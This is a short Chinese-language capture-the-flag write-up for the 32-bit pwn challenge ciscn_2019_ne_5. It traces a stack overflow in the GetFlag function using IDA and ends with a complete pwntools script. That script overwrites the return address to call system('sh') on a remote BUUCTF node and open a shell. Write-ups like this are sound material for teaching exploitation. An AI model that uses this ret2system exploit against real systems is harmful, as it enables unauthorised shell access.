题目截图
例行检查
32位的程序,开启了NX,用IDA打开,查看函数导入表,存在system函数
查看字符串,存在字符串sh,并且在fflash的结尾处
按u展开,得到字符串sh的起始地址为0x80482EA
在主函数中找到变量src,可以找到它到ebp的大小为0xfc
继续向下
继续向下找到两个可以溢出的函数
在函数AddLog中存在溢出,但是这个溢出点无法使用,因为它覆盖的是main函数的返回地址,但是main函数只有在输入0时才会结束,如果输入0就会执行exit函数导致程序直接结束
来看看GetFlag函数,变量dest到ebp的大小为0x48,而变量src中我们最多可以输入0x128个字节的数据,所以存在溢出,而且只需要保证GetFlag函数能结束就能到达我们覆盖的地址
exp
from pwn import*
elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')
p=remote('node4.buuoj.cn',28555)
str_sh=0x80482EA
system_plt=elf.plt['system']
p.sendline(b'administrator')
p.sendline(b'1')
payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)
p.sendline(payload)
p.sendline(b'4')
p.interactive()